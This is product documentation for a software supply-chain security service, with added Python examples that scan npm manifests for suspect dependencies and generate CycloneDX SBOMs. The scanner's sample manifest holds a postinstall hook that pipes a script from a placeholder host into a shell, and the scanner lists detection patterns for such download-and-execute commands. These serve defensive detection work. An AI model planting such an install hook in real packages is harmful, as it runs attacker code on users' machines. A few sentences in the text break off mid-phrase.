Open Source Security (OSS)

OSS Overview

Open Source Security offers real-time monitoring of your dependencies to detect and mitigate threats before they impact your software.

Recent reports reveal that nearly three-quarters of codebases now contain high-risk open-source components. Vulnerabilities have soared from 48% to 74% in just one year. Even more concerning, 91% of these components are at least 10 versions outdated, significantly heightening security risks. The rise of malicious open-source packages has been meteoric, with growth rates exceeding 300% year-over-year, resulting in over 245K malicious packages detected in 2023. It’s time to take action against these threats.

Given these challenges, Xygeni’s Open Source Security solution is essential. It scans and blocks harmful packages upon publication, dramatically reducing the risk of malware and vulnerabilities infiltrating your systems. This comprehensive monitoring spans multiple public registries, ensuring all dependencies are scrutinized for safety and integrity. Xygeni also enhances your team’s ability to maintain secure and reliable software projects by contextually prioritizing critical issues and streamlining remediation processes.

Xygeni Open Source Security is designed to provide complete protection against vulnerabilities and malicious code, ensuring your applications remain secure and resilient. With a robust suite of capabilities, Xygeni offers unparalleled visibility and control over your open-source components, helping you to manage risks effectively.

  1. Comprehensive Component Identification and cataloging of each open-source component within your software projects.

  2. Continuous Scanning and Vulnerability Management to ensure that every component, whether direct, indirect, or undeclared, is assessed for security vulnerabilities, maintenance issues, and licensing compliance.

  3. Context-aware prioritization based on their severity, exploitability, and potential business impact. This context-aware approach ensures that your security and development teams focus on the most critical issues.

  4. Expanded Security Beyond CVEs by incorporating additional risk factors beyond just CVSS scores. Xygeni prevents the integration of packages that may be CVE-free but still risky.

  5. License Risk Management with instant visibility into potential open-source license issues, helping your team avoid legal complications and ensure regulatory compliance.

  6. The one-click generation of SBOM and VDR in SPDX or CycloneDX formats ensures that your software components are transparent and compliant with regulatory requirements.

Comprehensive Component Identification

At the heart of Xygeni’s Open Source Security is our advanced capability to precisely identify and catalog every open-source component in your software projects. This thorough approach provides complete visibility into your software’s architecture, enabling a detailed assessment of your project’s security posture and compliance status. Your team can make better decisions by understanding exactly what makes up your software.

Strategic Approach for Risk Prioritization with ASPM

Xygeni’s software security platform excels in identifying and prioritizing vulnerabilities that pose the most significant risks to your software projects. By systematically analyzing the severity and potential impact of each identified vulnerability, Xygeni enables organizations to focus their resources on mitigating the most critical issues first. Our prioritization is driven by a combination of factors such as vulnerability severity, exploitability, exposure, the potential impact on business operations, and any other custom property defined by customers. Some key features of Xygeni’s prioritization process are:

  1. Continuous Scanning: Xygeni assesses each vulnerability based on its severity and the affected component’s context. This approach ensures that vulnerabilities are not just evaluated in isolation but are considered within the broader scope of the system’s architecture.

  2. Context-Aware Prioritization: Understanding that not all vulnerabilities are created equal, Xygeni prioritizes issues based on their operational and strategic impact. This means vulnerabilities that could lead to significant security breaches are flagged and addressed first.

  3. Customizable Risk Metrics: Xygeni allows organizations to customize how risks are scored and prioritized, aligning the prioritization process with their specific security policies and compliance requirements. This customization capability ensures that the security efforts perfectly sync with organizational priorities and risk

Malware Early Detection, Blocking, and Notification

As soon as new packages are published, Xygeni conducts a real-time scan to detect and block malware based on code behavior analysis, alleviating the need for extensive and urgent post-build remediation. Our systematic process works like this:

Continuous Scanning:

  • Public Registries Monitored: The service continuously scans multiple public registries like NPM, Maven, PyPI, etc.

  • Immediate Notification to Affected Users: As soon as a potential threat is detected, the system immediately notifies the affected users, enabling rapid response to mitigate risks. Notifications can be raised through standard Xygeni mechanisms such as email, messaging platforms, and webhooks.

Quarantine:

  • Automatic Blocking of Zero-Day Malware: Upon detection, suspicious packages are automatically quarantined. The customer can use this information to implement guardrails in their CI/CD to prevent the packages from entering the development environment or the broader software supply chain.

Review and Confirmation:

  • Code Review by Security Researchers: A security research team reviews the quarantined package to verify the threat.

  • Confirmation by Public Registry: If confirmed by our internal team, we communicate it to the public registry, which should confirm the finding and validate the threat level and the nature of the malware or vulnerability.

Disposal and Public Disclosure:

  • Disposal: Once a threat is confirmed, the appropriate measures are taken to dispose of the threat safely, ensuring it does not re-enter the ecosystem.

  • Public Disclosure: The usual details about the malware and its disposal are publicly disclosed through the product, Xygeni blog, or the package registry to inform the wider community and prevent

Simplify Open Source Licensing

Xygeni makes navigating the complexities of open-source licensing easy. Our scanning capabilities assess each component’s license, helping your team avoid legal issues and ensure compliance with both organizational policies and external regulations. With Xygeni, you can confidently use open-source software, knowing that all licensing requirements are met.

Keep Your Software Updated and Secure

Xygeni actively monitors and identifies outdated or obsolete components in your software projects. By ensuring your projects always utilize the latest and most secure versions, Xygeni not only reduces potential security risks but also boosts software performance and compatibility.

Advanced Detection of Suspect Dependencies

Xygeni’s Suspect Dependencies Scanner is crucial for identifying and managing suspect dependencies that could be targets for supply-chain attacks. By analyzing the dependency graph, our product can detect issues such as typo-squatting, dependency confusion, and suspicious installation scripts that may indicate a compromise. If a component is recognized as suspicious, Xygeni provides detailed mitigation and remediation strategies to help safely remove or isolate the threat. This includes recommendations for version pinning, using whitelisted components, and blocking suspicious installation scripts.

Optimized and Accelerated Remediation Workflows

Prioritizing vulnerabilities that pose the highest risk ensures that remediation efforts are concentrated where they are most needed, optimizing resource allocation and reducing the time and effort spent on lower-risk vulnerabilities. Moreover, Xygeni simplifies the remediation of open-source vulnerabilities by integrating directly into developers’ existing workflows and issue-tracking systems. This seamless integration provides all the necessary context for each vulnerability right within the tools developers already use, facilitating efficient and effective remediation.

Enhance Transparency and Compliance with SBOM and VDR Generation

Xygeni Open Source Security empowers organizations to maintain complete transparency over their software components with our SBOM generation feature. An SBOM facilitates compliance with regulatory requirements and enhances supply chain security by providing a detailed inventory of all software dependencies. Additionally, our Vulnerability Disclosure Report (VDR) generation capability ensures that all stakeholders are aware of potential vulnerabilities, enabling proactive risk management and reinforcing trust throughout the development lifecycle.

Effective Vulnerability Management

Xygeni enhances your software’s security by continuously scanning and analyzing open-source components for vulnerabilities. By connecting directly with the National Vulnerability Database (NVD), other vertical vulnerability databases and security advisories, and using Common Vulnerabilities and Exposures (CVE) information, Xygeni ensures fast and accurate detection of potential security issues to protect your software applications promptly and efficiently.

Overview of Supported Package Managers

Xygeni provides a comprehensive range of detectors tailored to the unique characteristics of various software package managers, ensuring comprehensive coverage and precise detection of dependencies.

Please visit Supported Package Managers for Dependency Resolution Analyzers for a full description of supported package managers.

Types of Suspect Dependency Detector

Open Source Security provides a comprehensive range of detectors tailored to the unique characteristics of various software ecosystems (Maven, PyPI, NPM, NuGet and others), ensuring comprehensive coverage and precise detection of suspect dependencies. See Open Source Analyzers for a complete list.

  • Anomalous Dependencies: Identifies unusual or unexpected dependencies within the context of the project, which may signal a security concern.

  • Dependency Confusion: This feature detects cases where internal package names may be confused with similarly named packages from public repositories, potentially leading to security breaches.

  • Known Vulnerabilities: Flags dependencies that contain recognized security vulnerabilities.

  • Malware: Looks for dependencies known to contain malware, providing critical security alerts to prevent potential harm.

  • Suspicious Scripts: Monitors for scripts within dependencies that might perform unauthorized or harmful actions.

  • Typosquatting: Aims to catch potentially malicious typosquatting attempts where package names are slightly altered to trick users into installing them.

  • Unscoped Internal Components: A special detector for NPM that identifies internal components published without a scope, which are therefore at risk of being publicly exposed or confused with external packages.
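The detectors listed above can be illustrated with a small script. The block below is an added example, not Xygeni's code: it runs simplified versions of the Malware, Suspicious Scripts, Typosquatting and Unscoped Internal Components checks over a constructed npm package.json, and ends with the kind of CI guardrail the Quarantine step describes (fail the build when a quarantined or typosquatted package, or a suspicious install hook, is found). The popular-package allow-list, the `acme-` / `@acme/` naming convention, the quarantine list and the script patterns are all assumptions made up for the example.

```python
"""Added example (not Xygeni code): simplified suspect-dependency checks run
over a constructed npm package.json. All reference data below is assumed."""
import json
import re

# Constructed manifest of a package as it might be fetched from a registry.
SAMPLE_PACKAGE_JSON = """
{
  "name": "report-tool",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s http://example.invalid/setup.sh | sh"
  },
  "dependencies": {
    "lodash": "4.17.21",
    "lodahs": "1.0.0",
    "acme-internal-auth": "2.3.1",
    "@acme/logger": "1.2.0",
    "evil-pkg": "0.0.1"
  }
}
"""

# Hypothetical reference data that a real scanner would maintain centrally.
POPULAR_PACKAGES = {"lodash", "express", "react", "axios", "chalk"}
INTERNAL_SCOPE = "@acme/"          # the organisation's registered npm scope
INTERNAL_PREFIXES = ("acme-",)     # legacy unscoped naming convention
QUARANTINED = {"evil-pkg"}         # packages the early-warning feed has quarantined
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
SUSPICIOUS_SCRIPT_PATTERNS = [
    r"\bcurl\s", r"\bwget\s",            # downloading content at install time
    r"\|\s*(sh|bash)\b",                 # piping downloaded content into a shell
    r"base64\s+(-d|--decode)\b",         # decoding an embedded payload
    r"child_process",                    # spawning processes from `node -e`
]


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance (Levenshtein plus adjacent
    transposition), so that 'lodahs' is one edit away from 'lodash'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def scan_manifest(text: str) -> list:
    """Return (detector, subject, detail) findings for one package.json."""
    manifest = json.loads(text)
    findings = []
    for name in manifest.get("dependencies", {}):
        if name in QUARANTINED:
            findings.append(("malware", name, "listed in the quarantine feed"))
        if name.startswith(INTERNAL_PREFIXES) and not name.startswith(INTERNAL_SCOPE):
            findings.append(("unscoped_internal", name,
                             "internal name without the organisation scope; "
                             "could resolve to a same-named public package"))
        if name not in POPULAR_PACKAGES:
            for popular in sorted(POPULAR_PACKAGES):
                if osa_distance(name, popular) <= 1:
                    findings.append(("typosquatting", name,
                                     f"one edit away from {popular!r}"))
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd and any(re.search(p, cmd) for p in SUSPICIOUS_SCRIPT_PATTERNS):
            findings.append(("suspicious_script", hook, cmd))
    return findings


def should_block(findings: list) -> bool:
    """CI guardrail: fail the build on detectors that indicate a compromise."""
    blocking = {"malware", "typosquatting", "suspicious_script"}
    return any(kind in blocking for kind, _, _ in findings)


if __name__ == "__main__":
    results = scan_manifest(SAMPLE_PACKAGE_JSON)
    for kind, subject, detail in results:
        print(f"[{kind}] {subject}: {detail}")
    raise SystemExit(1 if should_block(results) else 0)
```

Run as a script it prints one line per finding and exits non-zero when the guardrail trips, which is all a pipeline step needs. The unscoped-internal finding is reported but does not block by itself, since the right fix is to publish the package under the organisation's scope rather than to fail every build that still references the legacy name.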

To accomplish these functionalities, Xygeni provides a Scanner (to search for dependencies and security issues) and a Web UI to view the results.

See Scan with Xygeni CLI and, more specifically, Dependency Scanner and Suspect Dependencies Scanner for instructions on how to execute an Open Source scan.

SBOM and VDR capabilities

In response to growing cybersecurity threats, regulatory bodies worldwide are increasingly mandating the use of Software Bills of Materials (SBOMs). SBOMs provide essential visibility into the components of software applications, facilitating better vulnerability management and compliance with security standards.

Analyzers

Dependencies for each ecosystem are processed by a specific analyzer. The analyzer processes dependency descriptors to extract direct and indirect dependencies, resolve their versions, and gather context information such as licensing, provenance and other metadata.
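To make the analyzer step and the SBOM generation described above concrete, the following added example (not Xygeni's analyzer, and not the format of its output) walks a constructed npm package-lock.json: it resolves which lockfile entry each dependency actually points to using Node's nearest-node_modules rule, labels each component as direct or transitive with its resolved version and licence, and emits the result as a minimal CycloneDX 1.5 JSON document. The lockfile contents, package names and the nested duplicate of `debug` are constructed for the example; only runtime dependencies are walked and only the CycloneDX fields shown are produced.

```python
"""Added example (not Xygeni code): minimal npm lockfile analyzer plus
CycloneDX-style SBOM output. The lockfile below is constructed."""
import json
from collections import deque
from urllib.parse import quote

SAMPLE_LOCKFILE = """
{
  "name": "billing-service",
  "version": "1.0.0",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "billing-service", "version": "1.0.0",
         "dependencies": {"express": "^4.19.2", "report-tool": "^1.0.0", "@acme/logger": "^1.2.0"}},
    "node_modules/express": {"version": "4.19.2", "license": "MIT", "dependencies": {"debug": "2.6.9"}},
    "node_modules/debug": {"version": "2.6.9", "license": "MIT", "dependencies": {"ms": "2.0.0"}},
    "node_modules/ms": {"version": "2.0.0", "license": "MIT"},
    "node_modules/report-tool": {"version": "1.0.0", "dependencies": {"debug": "4.3.4"}},
    "node_modules/report-tool/node_modules/debug": {"version": "4.3.4", "license": "MIT", "dependencies": {"ms": "2.1.2"}},
    "node_modules/report-tool/node_modules/ms": {"version": "2.1.2", "license": "MIT"},
    "node_modules/@acme/logger": {"version": "1.2.0", "license": "MIT"}
  }
}
"""


def resolve_path(packages: dict, from_path: str, dep: str):
    """Lockfile entry that `dep` resolves to for the package at `from_path`:
    nearest nested node_modules first, then walk up to the project root.
    Returns None when the dependency is absent from the lockfile."""
    base = from_path
    while True:
        candidate = f"{base}/node_modules/{dep}" if base else f"node_modules/{dep}"
        if candidate in packages:
            return candidate
        if not base:
            return None
        idx = base.rfind("/node_modules/")
        base = base[:idx] if idx != -1 else ""


def analyze_lockfile(text: str) -> dict:
    """Breadth-first walk from the root package; returns path -> component info."""
    packages = json.loads(text)["packages"]
    components = {}
    queue = deque((resolve_path(packages, "", dep), 1)
                  for dep in packages[""].get("dependencies", {}))
    while queue:
        path, depth = queue.popleft()
        if path is None or path in components:
            continue
        entry = packages[path]
        components[path] = {
            "name": path.rsplit("node_modules/", 1)[1],   # keeps the @scope/ prefix
            "version": entry["version"],
            "license": entry.get("license"),              # None: lockfile carries no licence
            "direct": depth == 1,
            "depth": depth,
        }
        for child in entry.get("dependencies", {}):
            queue.append((resolve_path(packages, path, child), depth + 1))
    return components


def to_cyclonedx(components: dict) -> dict:
    """Minimal CycloneDX 1.5 JSON; purls percent-encode the npm scope's '@'."""
    items = []
    for c in components.values():
        comp = {"type": "library", "name": c["name"], "version": c["version"],
                "purl": f"pkg:npm/{quote(c['name'], safe='/')}@{c['version']}"}
        if c["license"]:
            comp["licenses"] = [{"license": {"id": c["license"]}}]
        items.append(comp)
    return {"bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": items}


def summary(components: dict) -> dict:
    """Direct vs transitive counts, components lacking a licence, and names
    resolved to more than one version (a common review starting point)."""
    by_name = {}
    for c in components.values():
        by_name.setdefault(c["name"], set()).add(c["version"])
    return {
        "direct": sum(c["direct"] for c in components.values()),
        "transitive": sum(not c["direct"] for c in components.values()),
        "missing_license": sorted(c["name"] for c in components.values() if not c["license"]),
        "multi_version": sorted(n for n, v in by_name.items() if len(v) > 1),
    }


if __name__ == "__main__":
    comps = analyze_lockfile(SAMPLE_LOCKFILE)
    print(json.dumps(summary(comps), indent=2))
    print(json.dumps(to_cyclonedx(comps), indent=2))
```

Two details are worth noting. Resolution is done against the lockfile paths rather than by name, because npm can install two versions of the same package side by side (here `debug` 2.6.9 at the top level and 4.3.4 nested under `report-tool`), and an SBOM that listed only one of them would understate what actually ships. A component with no `license` field is emitted without a `licenses` entry instead of a guessed value, so the gap stays visible to whoever reviews the report.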


See Malware Detection and Malware Early Warning Service
